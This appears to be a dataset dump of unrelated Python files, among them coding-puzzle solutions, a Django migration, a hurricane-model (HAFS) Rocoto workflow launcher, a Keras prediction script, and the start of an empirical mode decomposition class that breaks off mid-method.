text stringlengths 38 1.54M |
|---|
# YOUR CODE HERE
length = len(message)
index = 0
encoded = ''
while index < length:
letter = ord(message[index])
encLetter = letter + key
newLetter = chr(encLetter)
encoded = encoded + newLetter
index = index + 1 |
# Generated by Django 2.0.4 on 2018-04-28 19:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('page', '0012_merge_20180427_1450'),
]
operations = [
migrations.AddField(
model_name='club',
name='photo',
field=models.ImageField(default='static/images/300x100', upload_to='static/images'),
),
migrations.AlterField(
model_name='club',
name='website',
field=models.CharField(max_length=200),
),
]
|
import math
# raw_input() reads a string with a line of input, stripping the '\n' (newline) at the end.
# This is all you need for most Google Code Jam problems.
total = int(raw_input()) # read a line with a single integer
for numcases in xrange(1, total + 1):
S = list(raw_input())
alldict = {}
for x in S:
if x in alldict:
alldict[x] = alldict[x]+1
else:
alldict[x] = 1
#strnum = ["ZERO", "ONE", "TWO", "THREE", "FOUR", "FIVE", "SIX", "SEVEN", "EIGHT", "NINE"]
strnum = ["TWO", "SIX", "SEVEN", "FIVE", "FOUR", "EIGHT", "ZERO", "ONE", "NINE","THREE"]
outdig = [2,6,7,5,4,8,0,1,9,3]
output = []
for i in range(len(strnum)):
tempc = list(strnum[i])
tempdic = alldict.copy()
gonext = 0
thiscount = 0
while gonext == 0:
for ch in tempc:
if ch in tempdic and tempdic[ch] > 0:
tempdic[ch] -= 1
else:
gonext = 1
if (gonext == 0):
thiscount += 1
# print "thscount {} for {}".format(thiscount, i)
if thiscount > 0:
for ch in tempc:
alldict[ch] -= thiscount
for j in range(thiscount):
output.append(str(outdig[i]))
#print(alldict)
for anyy in alldict:
if alldict[anyy] != 0:
print(alldict)
output.sort()
print "Case #{}: {}".format(numcases, "".join(output))
# check out .format's specification for more formatting options
|
# https://leetcode.com/problems/verifying-an-alien-dictionary/
# 2020/10
# 32 ms
class Solution:
def compare(self, w1, w2, order):
for i in range(0, min(len(w1), len(w2))):
diff = order.find(w1[i]) - order.find(w2[i])
if diff != 0:
return diff
return len(w1) - len(w2)
def isAlienSorted(self, words: List[str], order: str) -> bool:
for i in range(0, len(words) - 1):
if self.compare(words[i], words[i + 1], order) > 0:
return False
return True
|
#! /usr/bin/env python3
##@namespace run_hafs
# @brief A wrapper around the Rocoto workflow system that knows how to run HAFS in Rocoto
#
# @anchor run_hafs_main
# This is a Python program, run_hafs.py, that users run to launch and maintain an
# HAFS workflow
#
# @code{.sh}
# run_hafs.py [options] [ensids and cycles] 95E case_root [conf]
# @endcode
#
# Arguments:
# * 95E --- stormid
# * case_root --- HISTORY for retrospective runs or FORECAST for real-time
#
# Options:
# * -f --- Force a run even if the *.xml and *.db file already exist
# * -w workflow.xml --- specify the Rocoto XML file
# * -d workflow.db --- specify the Rocoto database file
# * -s site-file.ent --- Specify the site file in the sites/ subdirectory
#
# Cycles:
# * 2014081412 --- one cycle to run
# * 2014081400-2014081618 --- a range of cycles to run
# * 2014 --- run all cycles for this storm in this year
# * -t --- include cycles even if they are not in the tcvitals
# * -n --- disable renumbering of invests into non-invests
# * -W N --- discard invests weaker than N m/s before renumbering
#
# Conf options:
# * ../parm/hafs_more.conf --- read this configuration file
# * config.run_gsi=yes --- specify the value of one configuration option
##@cond RUN_HAFS_PY
import os, sys, re, logging, collections, io, getopt, itertools
from os.path import realpath, normpath, dirname
def ask(question):
sys.stdout.write(question)
itry=0
itrytoohard=100
go=True
while go:
itry+=1
x=sys.stdin.readline()
if x.lower()=='y\n':
return True
elif x.lower()=='n\n':
return False
elif itry>=itrytoohard:
sys.stderr.write('Giving up after %d failed responses.'%itry)
sys.exit(2)
else:
sys.stdout.write('Please answer y or n.')
def usage(message=None,logger=None):
"""!Dumps a usage message and exits with status 2.
@param message An extra message to send to stderr after the usage message
@param logger Ignored."""
print('''
Usage: run_hafs.py [options] [cycles] 95E case_root [conf]
Mandatory arguments:
95E -- the storm to run
case_root -- FORECAST = real-time mode, HISTORY = retrospective mod
Workflow options:
-f -- Tells the run_hafs.py that you already ran it once for this
storm, cycle list and experiment. It will use any existing
*.xml or *.db file without asking for permission. Critical
in crontabs.
-w workflow-file.xml -- use this as the output XML file to send
into rocotorun (rocotorun's -w option)
-d workflow-db.db -- use this as the SQLite3 database file for
Rocoto (rocotorun's -d option)
Specifying a site:
-s site-file -- path to a custom-made site file, rather than using
one automatically chosen from sites/*.ent. Do not include any
shell or XML metacharacters in the name.
PATHS:
This script should be run from the rocoto/ subdirectory of the HAFS
installation location so it can guess the ush/ and parm/ locations
(../ush and ../parm). You can override those guesses by providing
the paths in the $USHhafs and $PARMhafs environment variables.
SPECIFYING CYCLES:
-c N -- number of hours between cycles. This ONLY affects cycle
specifications after the -c option.
[cycles] -- one or more cycle specifications:
2014091312-2014091712 - run this range of cycles
2014091312 - run this cycle
2014 - all cycles from 0Z January 1, 2014 to
the end of that year.
2014091312-2014091712 2014091800 - run cycles from 2014091312
through 2014091712 AND run 2014091800
-t -- include cycles even if they are not in the tcvitals. This
option is turned on automatically when H214 cycle lists are
requested.
-n -- disable renumbering of invests to non-invests. This is done
automatically when an invest is requested.
-W N -- discard invests weaker than N meters per second before
renumbering. Default: -W 14 if a non-invest storm is
requested, and -W 0 (don't discard) if an invest is requested.
Configuration ([conf]):
section.option=value -- override conf options on the command line
/path/to/file.conf -- additional conf files to parse''', file=sys.stderr)
if message is not None:
print(str(message).rstrip()+'\n', file=sys.stderr)
sys.exit(2)
########################################################################
# Try to guess $USHhafs and $PARMhafs. The $HOMEhafs or current
# working directory are used if $USHhafs and $PARMhafs are not set in
# the environment. We also add the $USHhafs to the Python library
# path.
##@var USHhafs
# The ush/ subdirectory of the HAFS installation directory
USHhafs=None
##@var HOMEhafs
# The HAFS installation directory
HOMEhafs=None
##@var PARMhafs
# The parameter directory
PARMhafs=None
if os.environ.get('USHhafs',''): USHhafs=os.environ['USHhafs']
if os.environ.get('PARMhafs',''): PARMhafs=os.environ['PARMhafs']
if os.environ.get('HOMEhafs',''): HOMEhafs=os.environ['HOMEhafs']
if HOMEhafs is None and (USHhafs is None or PARMhafs is None):
HOMEhafs=dirname(os.getcwd())
USHguess=os.path.join(HOMEhafs,'ush')
PARMguess=os.path.join(HOMEhafs,'parm')
if os.path.isdir(USHguess) and os.path.isdir(PARMguess):
if USHhafs is None: USHhafs=USHguess
if PARMhafs is None: PARMhafs=PARMguess
if HOMEhafs is not None:
if USHhafs is None: USHhafs=os.path.join(HOMEhafs,'ush')
if PARMhafs is None: PARMhafs=os.path.join(HOMEhafs,'parm')
if USHhafs is None:
print("Cannot guess $USHhafs. Please set $HOMEhafs or " \
"$USHhafs in environment.", file=sys.stderr)
sys.exit(2)
if PARMhafs is None:
print("Cannot guess $PARMhafs. Please set $HOMEhafs or " \
"$PARMhafs in environment.", file=sys.stderr)
sys.exit(2)
if HOMEhafs is None:
print("Cannot guess $HOMEhafs. Please set $HOMEhafs " \
"in the environment.", file=sys.stderr)
sys.exit(2)
sys.path.append(USHhafs)
########################################################################
# Load and set up the produtil package.
import hafs.launcher, hafs.prelaunch
import tcutil.revital, tcutil.numerics, tcutil.rocoto
from tcutil.numerics import to_datetime, to_timedelta
from tcutil.rocoto import entity_quote
import produtil.setup, produtil.atparse, produtil.run, produtil.prog, \
produtil.fileop, produtil.batchsystem, produtil.cluster
from produtil.fileop import remove_file, isnonempty
from produtil.run import run, exe, runstr
from produtil.prog import shbackslash
#######import hafs.launcher
#######import hafs_expt
produtil.batchsystem.set_jobname('run_hafs')
produtil.setup.setup(send_dbn=False)
########################################################################
# Global variables and constants
logger=logging.getLogger('run_hafs')
epsilon = to_timedelta(5) # five seconds
six_hours = to_timedelta(6*3600)
cycling_interval = six_hours
cycleset = set()
enset = set()
mslist = list()
mblist = list()
benchmarkset = None
parse_tcvitals = True
renumber = True
force = False
site_file = ''
outxml = ''
outdb = ''
dateargs = list()
iarg = 0
firstarg = 0
weak_invest = None
multistorm = False
storms_opt = ''
basins_opt = ''
renumber_opt = ''
def okpath(path):
return produtil.fileop.norm_expand_path(path,fullnorm=True)
########################################################################
# Parse the options and arguments.
short_opts = "c:d:fm:M:ns:tW:w:"
long_opts = ["cycling=",
"database=",
"force",
"multistorms=",
"multibasins=",
"renumber=",
"site=",
"tcvitals",
"weak",
"workflow="
]
try:
opts, args = getopt.getopt(sys.argv[1:], short_opts, long_opts)
except getopt.GetoptError as err:
print(str(err))
usage('SCRIPT IS ABORTING DUE TO UNRECOGNIZED ARGUMENT')
for k, v in opts:
if k in ('-c', '--cycling'):
cycling_interval = to_timedelta(int(v)*3600)
elif k in ('-d', '--database'):
outdb = v
elif k in ('-f', '--force'):
force = True
elif k in ('-m', '--multistorms'):
mslist.extend(v.split(","))
multistorm = True
storms_opt=''.join(['-m ', ','.join(mslist)])
elif k in ('-M', '--multibasins'):
mblist.extend(v.split(","))
multistorm = True
basins_opt=''.join(['-M ', ','.join(mblist)])
elif k in ('-n', '--renumber'):
renumber = False
renumber_opt='-n'
elif k in ('-s', '--site'):
site_file = str(v)
elif k in ('-t', '--tcvitals'):
parse_tcvitals = False
elif k in ('-W', '--weak'):
weak_invest = int(v)
elif k in ('-w', '--workflow'):
outxml = v
else:
assert False, "UNHANDLED OPTION"
# Make sure the workflow isn't the database
if outxml[-3:]=='.db':
usage('When using the -d option, the Rocoto XML filename must '
'not end with ".db".')
# Make sure the database isn't the workflow
if outdb[-4:]=='.xml':
usage('When using the -d option, the database filename must '
'not end with ".xml".')
for arg in args:
if re.match('\A\d\d\Z',arg):
logger.info('ensemble id')
# Single ensemble ID
enset.add('%02d'%int(arg,10))
elif re.match('\A\d\d-\d\d\Z',arg):
logger.info('list of ensemble ids')
# List of ensemble IDs
en1=int(arg[0:2],10)
en2=int(arg[3:],10)
enset.update([ "%02d"%(x+en1) for x in range(en2-en1+1) ])
elif re.match('\A\d{10}\Z',arg):
logger.info('single date/time')
# Single date/time
cycleset.add(arg)
dateargs.append(arg)
elif re.match('\A\d{4}\Z',arg):
logger.info('year')
# Year
start=to_datetime(arg+'01010000')
end=to_datetime(arg+'12312359')
now=start
while now<end+epsilon:
cycleset.add(now.strftime('%Y%m%d%H'))
now+=cycling_interval
dateargs.append(arg)
elif re.match('\A\d{10}-\d{10}\Z',arg):
logger.info('range of cycles')
# Range of date/times
start=to_datetime(arg[0:10])
end=to_datetime(arg[11:])
now=start
while now<end+epsilon:
cycleset.add(now.strftime('%Y%m%d%H'))
now+=cycling_interval
dateargs.append(start)
elif re.match('\A\d\d[A-Z]\Z',arg.upper()):
logger.info('storm id')
# Storm ID. This ends our argument parsing. We pass the
# remaining arguments on to parse_launch_args.
firstarg=iarg
if renumber:
if arg[0]=='9':
logger.info('Disabling renumbering for invest storm '+arg)
renumber=False
elif arg[0]=='8':
logger.info('Disabling renumbering for test storm '+arg)
renumber=False
break
elif re.match('\AH214:\d\d\d\d\Z',arg.upper()):
# H214 cycle requested
logger.info('H214 - use the H214 benchmark cycles')
parse_tcvitals=False
benchmarkset=arg.upper()
# else:
# usage('SCRIPT IS ABORTING DUE TO UNRECOGNIZED ARGUMENT "%s"'%(arg,))
iarg+=1
if benchmarkset and cycleset:
usage('SCRIPT IS ABORTING: YOU CANNOT SPECIFY CYCLES AND '
'USE A BENCHMARK SET')
if enset==set(['99']):
enset=set()
# Now parse the rest of the arguments the same way as exhafs_launch:
print('firstarg',firstarg)
print('argsfirstarg..',args[firstarg:])
stid=args[firstarg]
case_root=args[firstarg+1]
logger.info('Running for storm '+stid.upper())
def fullify(s):
m=re.match('''(?x)(?P<section>[a-zA-Z][a-zA-Z0-9_]*)\.(?P<option>[^=]+)=(?P<value>.*)$''',s)
if not m:
return os.path.abspath(s)
else:
return s
# Turn any conf files specified in arguments into fully-qualified
# paths. This is needed because run_hafs will generally be started
# from a different directory than the exhafs_launch.py.
if firstarg+2<len(args):
confargs=args[(firstarg+2):]
more_launch_vars=' '.join(
entity_quote(shbackslash(fullify(str(x))))
for x in confargs)
else:
confargs=list()
more_launch_vars=''
logger.info('MORE_LAUNCH_VARS='+repr(more_launch_vars))
# Tell the hafs.launcher to parse the remaining arguments so we can
# make the conf information:
# Generate the conf file and run the hafs.launcher's sanity checks
# that do not require a cycle:
# mslist does not contain the fakestorm id
logger.info('MSLIST: ' +repr(mslist))
if multistorm:
(case_root,parm,infiles,stids,stid,pstid,moreopts)=hafs.launcher.multistorm_parse_args(
mslist,args[firstarg:],logger,usage,PARMhafs=PARMhafs)
fakestid = stid
logger=logging.getLogger('run_hafs_'+str(fakestid))
# stids list includes all storm ids AND the fake storm id.
conf = hafs.launcher.launch(infiles,None,fakestid,moreopts[stids.index(pstid)],
case_root,init_dirs=False,
prelaunch=hafs.launcher.prelaunch,
fakestorm=True)
else:
(case_root,parm,infiles,stid,moreopt)=hafs.launcher.parse_launch_args(
args[firstarg:],logger,usage,PARMhafs=PARMhafs)
logger=logging.getLogger('run_hafs_'+str(stid))
if(weak_invest is None):
if(str(stid)[0]=='9'):
logger.info('Invest requested, and no -w given. Not discarding '
'weak Invests.')
weak_invest=0
else:
logger.info('Non-Invest requested, and no -w given. Will start '
'cycling off of last Invest <14m/s.')
weak_invest=14
# Note: this weak_invest default must match the value in
# relocate's Stage1.run function.
conf=hafs.launcher.launch(infiles,None,stid,moreopt,case_root,
init_dirs=False,prelaunch=hafs.launcher.prelaunch)
logger.info('Run sanity checks.')
try:
conf.timeless_sanity_check(enset,logger)
except Exception as e:
tcutil.rocoto.sanity_check_failed(logger,e)
logger.error("HAFS Sanity Checker Designation: INSANE!")
logger.error("Check your configuration for errors.")
logger.error("See earlier messages for clues.")
sys.exit(1)
logger.info("I think I'm sane.")
# Try to connect to the jlogfile:
loghere=conf.getloc('jlogfile','')
if not loghere:
try:
loghere=os.path.join(
conf.getloc('CDSCRUB'),conf.getstr('config','SUBEXPT'),
'log','jlogfile')
except KeyError as ke:
loghere=None
if loghere:
print('Sending jlogfile messages to %s'%(loghere,))
produtil.log.set_jlogfile(loghere)
########################################################################
# Parse the tcvitals
def check_test_vitals(vl):
"""!This is a replacement for tcutil.storminfo.name_number_okay for
use with TEST storms and internal stormids. It allows through
only the storm numbers matching stormnum, regardless of the
storm name (usually TEST and UNKNOWN would be dropped)."""
logger.info('Keeping only storm number %s in vitals'%(stid,))
for vital in vl:
if vital.stormid3.upper()==stid.upper():
yield vital
if parse_tcvitals:
logger.info('Getting list of tcvitals files.')
syndatdir=conf.getdir('syndat')
vitpattern=conf.getstr('config','vitpattern','syndat_tcvitals.%Y')
fileset=set()
for cycle in cycleset:
when=to_datetime(cycle)
vitfile=os.path.join(syndatdir,when.strftime(vitpattern))
fileset.add(vitfile)
revit=tcutil.revital.Revital(logger=logger)
logger.info('List of files to scan: '+(','.join(fileset)))
revit.readfiles(fileset,raise_all=False)
if renumber:
logger.info('Renumber invest cycles.')
if weak_invest is not None:
revit.renumber(threshold=int(weak_invest))
else:
revit.renumber()
elif stid[0]=='8':
logger.info('Fake stormid requested. Running limited clean-up.')
revit.clean_up_vitals(name_number_checker=check_test_vitals)
else:
logger.info('Not renumbering invest cycles. Will just clean.')
revit.clean_up_vitals()
tcvset = set()
if mslist:
for ms_id in mslist:
tcvset.update([ vit.when.strftime('%Y%m%d%H') for vit in revit.each(ms_id) ])
else:
tcvset.update([ vit.when.strftime('%Y%m%d%H') for vit in revit.each(stid) ])
notok = cycleset - tcvset
okset = cycleset - notok
if not multistorm or mslist:
cycleset=okset
listed=list(notok)
listed.sort()
logger.debug('NOTOK = '+( ','.join(listed) ))
listed=list(cycleset)
listed.sort()
if not listed:
produtil.log.jlogger.info(
'%s %s: no cycles to run. Exiting.'
%(str(stid),' ' + repr(dateargs)))
sys.exit(0)
else:
logger.info('I will ONLY run these cycles, since they have vitals:'
+(','.join(listed)))
########################################################################
# Create the list of variables to send to the ATParser
VARS=dict(os.environ)
if cycleset:
VARS['CYCLE_LIST']=tcutil.rocoto.cycles_as_entity(cycleset)
for line in VARS['CYCLE_LIST'].splitlines():
logger.info('Rocoto cycles: %s'%(line.rstrip(),))
cyclelist=list(cycleset)
cyclelist.sort()
firstcycle=to_datetime(cyclelist[0])
cycledesc=firstcycle.strftime('%Y%m%d%H')
else:
assert(isinstance(benchmarkset,str))
year=int(benchmarkset[5:])
number=sid[0:2]
basin1=sid[2].upper()
(ibasin2,basin2,basin1,longinfo) = \
tcutil.storminfo.expand_basin(basin1)
cycledesc='&%s%s%s;'%(basin2,number,year)
VARS['CYCLE_LIST']=cycledesc
if multistorm:
VARS.update(MULTISTORM='YES',
RENUM=renumber_opt,
BASINS=basins_opt,
MULTISTORM_SIDS=storms_opt,
FAKE_SID=fakestid.upper())
else:
VARS.update(MULTISTORM='NO')
try:
stormlabel=conf.get('config','stormlabel','storm1')
except KeyError:
stormlabel='storm1'
def yesno(b):
return 'YES' if(b) else 'NO'
VARS.update(SID=stid.upper(), stormlabel=str(stormlabel),
WHERE_AM_I=conf.get('holdvars','WHERE_AM_I'),
WHICH_JET=conf.get('holdvars','WHICH_JET','none'),
MORE_LAUNCH_VARS=more_launch_vars,
CASE_ROOT=case_root,
SITE_FILE=site_file,
FETCH_INPUT=yesno(conf.get('config','input_catalog')=='hafsdata'),
)
for (key,val) in conf.items('rocotostr'):
VARS[key]=str(val)
for (key,val) in conf.items('rocotobool'):
VARS[key]=yesno(conf.getbool('rocotobool',key))
if conf.getbool('config','run_ensda',False):
ens_size=conf.getint('config','ENS_SIZE',40)
assert(ens_size>=1)
ensids=' '.join([ '%03d'%(i+1) for i in range(ens_size) ])
VARS.update(ENS_SIZE='%d'%ens_size,ENSIDS=ensids)
else:
VARS.update(ENS_SIZE='000',ENSIDS='000')
bad=False
for k,v in VARS.items():
if not isinstance(v,str):
logger.error('%s: value is not a string. '
'It is type %s with value %s'%(
str(k),type(v).__name__,repr(v)))
bad=True
if bad: sys.exit(1)
########################################################################
# Order the ATParser to create the XML file.
rocotoxml=io.StringIO()
parser=produtil.atparse.ATParser(rocotoxml,varhash=VARS,logger=logger)
if multistorm:
parser.parse_file('hafs_multistorm_workflow.xml.in')
else:
parser.parse_file('hafs_workflow.xml.in')
outbase='hafs-%s-%s-%s'%(
conf.get('config','SUBEXPT'),
stid.upper(),
cycledesc)
if not outxml: outxml=okpath(outbase+'.xml')
if not outdb: outdb=okpath(outbase+'.db')
havexml=isnonempty(outxml)
if havexml:
if not force and \
not ask('ALERT! %s: XML file exists. Overwrite (y/n)?'%(outxml,)):
logger.error('%s: file exists, user does not want to overwrite.'
%(outxml,))
sys.exit(1)
else:
logger.warning('%s: overwriting pre-existing XML file.'%(outxml,))
havedb=isnonempty(outdb)
deletedb=False
if havedb:
if force or ask(
'ALERT! %s: database for old configuration exists. Use it (y/n)?'
%(outdb,)):
logger.warning('%s: not deleting database for old configuration.'
%(outdb,))
elif ask('%s: Delete database for old configuration (y/n)?'%(outdb,)):
logger.warning('%s: deleting database for old configuration.'
%(outdb,))
remove_file(outdb)
else:
logger.error('%s: database exists, user does not want to delete '
'or use it. Aborting.')
sys.exit(2)
with open(outxml,'wt') as outf:
outf.write(rocotoxml.getvalue())
########################################################################
# Run rocotorun
clustername=produtil.cluster.name()
if clustername in ('cactus','dogwood'):
WHERE_AM_I='wcoss2'
else:
WHERE_AM_I=clustername
cmd = exe('sh') [
'-c', '. %s/hafs_pre_job.sh.inc; which ruby ; which rocotorun ; rocotorun --verbose=5 -d %s -w %s'
%( shbackslash(USHhafs), shbackslash(outdb),
shbackslash(outxml) ) ] .env(QUIET_PRE_JOB='YES',
HOMEhafs=HOMEhafs,
WHERE_AM_I=WHERE_AM_I) \
< '/dev/null'
result=run(cmd,logger=logger)
if result:
sys.exit(result)
produtil.jlogger.critical('rocotorun failed')
produtil.log.postmsg('Successfully ran rocotorun for %s.'%(outbase,))
bakdb=outdb+'.bak'
logger.info('Making a backup copy of .db file here: %s'%(bakdb,))
produtil.fileop.deliver_file(outdb,bakdb)
logger.info('Success. Rejoice: hurrah!')
##@endcond
|
from keras.models import model_from_json
import pandas as pd
# load json and create model
json_file = open('cnn_model.json', 'r')
loaded_model_json = json_file.read()
json_file.close()
loaded_model = model_from_json(loaded_model_json)
# load weights into new model
loaded_model.load_weights("cnn_model.h5")
print("Loaded model from disk")
x_test = pd.read_csv('/Users/karan/Documents/karan/karan_Project/test.csv')
x_test = x_test.iloc[:, :]
x_test = x_test.values
x_test = x_test.reshape(x_test.shape[0], 1, 28, 28).astype('float32')
x_test /= 255
predictions = loaded_model.predict_classes(x_test, batch_size=128, verbose=1)
df = pd.DataFrame(predictions)
df.to_csv("predictions_cnn.csv")
print('Saved the predictions!')
|
#!/usr/bin/python
# coding: UTF-8
#
# Author: Dawid Laszuk
# Contact: laszukdawid@gmail.com
#
# Edited: 11/05/2017
#
# Feel free to contact for any information.
from __future__ import division, print_function
import logging
import numpy as np
import os
from scipy.interpolate import interp1d
from PyEMD.splines import *
class EMD:
"""
Empirical Mode Decomposition
*Note:*
Default and recommended package for EMD is EMD.py.
Advantage of this is that it utilises Kahan summation algorithm,
which reduces numerical error when subtracting numerically.
Method of decomposing signal into Intrinsic Mode Functions (IMFs)
based on algorithm presented in Huang et al. [1].
Algorithm was validated with Rilling et al. [2] Matlab's version from 3.2007.
[1] N. E. Huang et al., "The empirical mode decomposition and the
Hilbert spectrum for non-linear and non stationary time series
analysis", Proc. Royal Soc. London A, Vol. 454, pp. 903-995, 1998
[2] G. Rilling, P. Flandrin and P. Goncalves, "On Empirical Mode
Decomposition and its algorithms", IEEE-EURASIP Workshop on
Nonlinear Signal and Image Processing NSIP-03, Grado (I), June 2003
"""
logger = logging.getLogger(__name__)
def __init__(self):
# Declare constants
self.stdThreshold = 0.2
self.scaledVarThreshold = 0.001
self.powerThreshold = -5
self.totalPowerThreshold = 0.01
self.rangeThreshold = 0.001
self.nbsym = 2
self.reduceScale = 1.
self.scaleFactor = 100.
self.PLOT = 0
self.INTERACTIVE = 0
self.plotPath = 'splineTest'
self.splineKind = 'akima'
self.extrema_detection = 'simple' # simple, parabol
self.DTYPE = np.float64
self.FIXE = 0
self.FIXE_H = 0
self.MAX_ITERATION = 1000
if self.PLOT:
import pylab as plt
def extract_max_min_spline(self, T, S):
"""
Input:
-----------------
T - Time array.
S - Signal.
Output:
-----------------
maxSpline - Spline which connects maxima of S.
minSpline - Spline which connects minima of S.
"""
# Get indexes of extrema
maxPos, maxVal, minPos, minVal, indzer = self.find_extrema(T, S)
if maxPos.dtype!=self.DTYPE: self.logger.error('maxPos.dtype: '+str(maxPos.dtype))
if maxVal.dtype!=self.DTYPE: self.logger.error('maxVal.dtype: '+str(maxVal.dtype))
if minPos.dtype!=self.DTYPE: self.logger.error('minPos.dtype: '+str(minPos.dtype))
if minVal.dtype!=self.DTYPE: self.logger.error('minVal.dtype: '+str(minVal.dtype))
if len(maxPos) + len(minPos) < 3: return [-1]*4
#########################################
# Extrapolation of signal (over boundaries)
maxExtrema, minExtrema = self.prepare_points(T, S, maxPos, maxVal, minPos, minVal)
maxTSpline, maxSpline = self.spline_points(T, maxExtrema)
minTSpline, minSpline = self.spline_points(T, minExtrema)
if maxExtrema.dtype!=self.DTYPE: self.logger.error('maxExtrema.dtype: '+str(maxExtrema.dtype))
if maxSpline.dtype!=self.DTYPE: self.logger.error('maxSpline.dtype: '+str(maxSpline.dtype))
if maxTSpline.dtype!=self.DTYPE: self.logger.error('maxTSline.dtype: '+str(maxTSpline.dtype))
return maxSpline, minSpline, maxExtrema, minExtrema
def prepare_points(self, T, S, maxPos, maxVal, minPos, minVal):
if self.extrema_detection=="parabol":
return self._prepare_points_parabol(T, S, maxPos, maxVal, minPos, minVal)
elif self.extrema_detection=="simple":
return self._prepare_points_simple(T, S, maxPos, maxVal, minPos, minVal)
else:
msg = "Incorrect extrema detection type. Please try: "
msg+= "'simple' or 'parabol'."
raise ValueError(msg)
def _prepare_points_parabol(self, T, S, maxPos, maxVal, minPos, minVal):
"""
Input:
---------
S - Signal values (1D numpy array).
T - Timeline of values (1D numpy array).
extrema - Indexes of extrema points (1D list).
Output:
---------
leftP - (time, value) of left mirrored extrema.
rightP - (time, value) of right mirrored extrema.
"""
# Need at least two extrema to perform mirroring
maxExtrema = np.zeros((2,len(maxPos)), dtype=self.DTYPE)
minExtrema = np.zeros((2,len(minPos)), dtype=self.DTYPE)
maxExtrema[0], minExtrema[0] = maxPos, minPos
maxExtrema[1], minExtrema[1] = maxVal, minVal
# Local variables
nbsym = self.nbsym
endMin, endMax = len(minPos), len(maxPos)
####################################
# Left bound
dPos = maxPos[0] - minPos[0]
leftExtType = ["min", "max"][dPos<0]
if (leftExtType == "max"):
if (S[0]>minVal[0]) and (np.abs(dPos)>(maxPos[0]-T[0])):
# mirror signal to first extrema
expandLeftMaxPos = 2*maxPos[0] - maxPos[1:nbsym+1]
expandLeftMinPos = 2*maxPos[0] - minPos[0:nbsym]
expandLeftMaxVal = maxVal[1:nbsym+1]
expandLeftMinVal = minVal[0:nbsym]
else:
# mirror signal to beginning
expandLeftMaxPos = 2*T[0] - maxPos[0:nbsym]
expandLeftMinPos = 2*T[0] - np.append(T[0], minPos[0:nbsym-1])
expandLeftMaxVal = maxVal[0:nbsym]
expandLeftMinVal = np.append(S[0], minVal[0:nbsym-1])
elif (leftExtType == "min"):
if (S[0] < maxVal[0]) and (np.abs(dPos)>(minPos[0]-T[0])):
# mirror signal to first extrema
expandLeftMaxPos = 2*minPos[0] - maxPos[0:nbsym]
expandLeftMinPos = 2*minPos[0] - minPos[1:nbsym+1]
expandLeftMaxVal = maxVal[0:nbsym]
expandLeftMinVal = minVal[1:nbsym+1]
else:
# mirror signal to beginning
expandLeftMaxPos = 2*T[0] - np.append(T[0], maxPos[0:nbsym-1])
expandLeftMinPos = 2*T[0] - minPos[0:nbsym]
expandLeftMaxVal = np.append(S[0], maxVal[0:nbsym-1])
expandLeftMinVal = minVal[0:nbsym]
if not expandLeftMinPos.shape:
expandLeftMinPos, expandLeftMinVal = minPos, minVal
if not expandLeftMaxPos.shape:
expandLeftMaxPos, expandLeftMaxVal = maxPos, maxVal
expandLeftMin = np.vstack((expandLeftMinPos[::-1], expandLeftMinVal[::-1]))
expandLeftMax = np.vstack((expandLeftMaxPos[::-1], expandLeftMaxVal[::-1]))
####################################
# Right bound
dPos = maxPos[-1] - minPos[-1]
rightExtType = ["min","max"][dPos>0]
if (rightExtType == "min"):
if (S[-1] < maxVal[-1]) and (np.abs(dPos)>(T[-1]-minPos[-1])):
# mirror signal to last extrema
idxMax = max(0, endMax-nbsym)
idxMin = max(0, endMin-nbsym-1)
expandRightMaxPos = 2*minPos[-1] - maxPos[idxMax:]
expandRightMinPos = 2*minPos[-1] - minPos[idxMin:-1]
expandRightMaxVal = maxVal[idxMax:]
expandRightMinVal = minVal[idxMin:-1]
else:
# mirror signal to end
idxMax = max(0, endMax-nbsym+1)
idxMin = max(0, endMin-nbsym)
expandRightMaxPos = 2*T[-1] - np.append(maxPos[idxMax:], T[-1])
expandRightMinPos = 2*T[-1] - minPos[idxMin:]
expandRightMaxVal = np.append(maxVal[idxMax:],S[-1])
expandRightMinVal = minVal[idxMin:]
elif (rightExtType == "max"):
if (S[-1] > minVal[-1]) and len(maxPos)>1 and (np.abs(dPos)>(T[-1]-maxPos[-1])):
# mirror signal to last extremum
idxMax = max(0, endMax-nbsym-1)
idxMin = max(0, endMin-nbsym)
expandRightMaxPos = 2*maxPos[-1] - maxPos[idxMax:-1]
expandRightMinPos = 2*maxPos[-1] - minPos[idxMin:]
expandRightMaxVal = maxVal[idxMax:-1]
expandRightMinVal = minVal[idxMin:]
else:
# mirror signal to end
idxMax = max(0, endMax-nbsym)
idxMin = max(0, endMin-nbsym+1)
expandRightMaxPos = 2*T[-1] - maxPos[idxMax:]
expandRightMinPos = 2*T[-1] - np.append(minPos[idxMin:], T[-1])
expandRightMaxVal = maxVal[idxMax:]
expandRightMinVal = np.append(minVal[idxMin:], S[-1])
if not expandRightMinPos.shape:
expandRightMinPos, expandRightMinVal = minPos, minVal
if not expandRightMaxPos.shape:
expandRightMaxPos, expandRightMaxVal = maxPos, maxVal
expandRightMin = np.vstack((expandRightMinPos[::-1], expandRightMinVal[::-1]))
expandRightMax = np.vstack((expandRightMaxPos[::-1], expandRightMaxVal[::-1]))
maxExtrema = np.hstack((expandLeftMax, maxExtrema, expandRightMax))
minExtrema = np.hstack((expandLeftMin, minExtrema, expandRightMin))
return maxExtrema, minExtrema
def _prepare_points_simple(self, T, S, maxPos, maxVal, minPos, minVal):
"""
Adds to signal extrema according to mirror technique.
Number of added points depends on nbsym variable.
Input:
---------
S: Signal (1D numpy array).
T: Timeline (1D numpy array).
maxPos: sorted time positions of maxima.
maxVal: signal values at maxPos positions.
minPos: sorted time positions of minima.
minVal: signal values at minPos positions.
Output:
---------
minExtrema: Position (1st row) and values (2nd row) of minima.
minExtrema: Position (1st row) and values (2nd row) of maxima.
"""
# Find indexes of pass
indmin = np.array([np.nonzero(T==t)[0] for t in minPos]).flatten()
indmax = np.array([np.nonzero(T==t)[0] for t in maxPos]).flatten()
if S.dtype != self.DTYPE: self.logger.error('S.dtype: '+str(S.dtype))
if T.dtype != self.DTYPE: self.logger.error('T.dtype: '+str(T.dtype))
# Local variables
nbsym = self.nbsym
endMin, endMax = len(minPos), len(maxPos)
####################################
# Left bound - mirror nbsym points to the left
if indmax[0] < indmin[0]:
if S[0] > S[indmin[0]]:
lmax = indmax[1:min(endMax,nbsym+1)][::-1]
lmin = indmin[0:min(endMin,nbsym+0)][::-1]
lsym = indmax[0]
else:
lmax = indmax[0:min(endMax,nbsym)][::-1]
lmin = np.append(indmin[0:min(endMin,nbsym-1)][::-1],0)
lsym = 0
else:
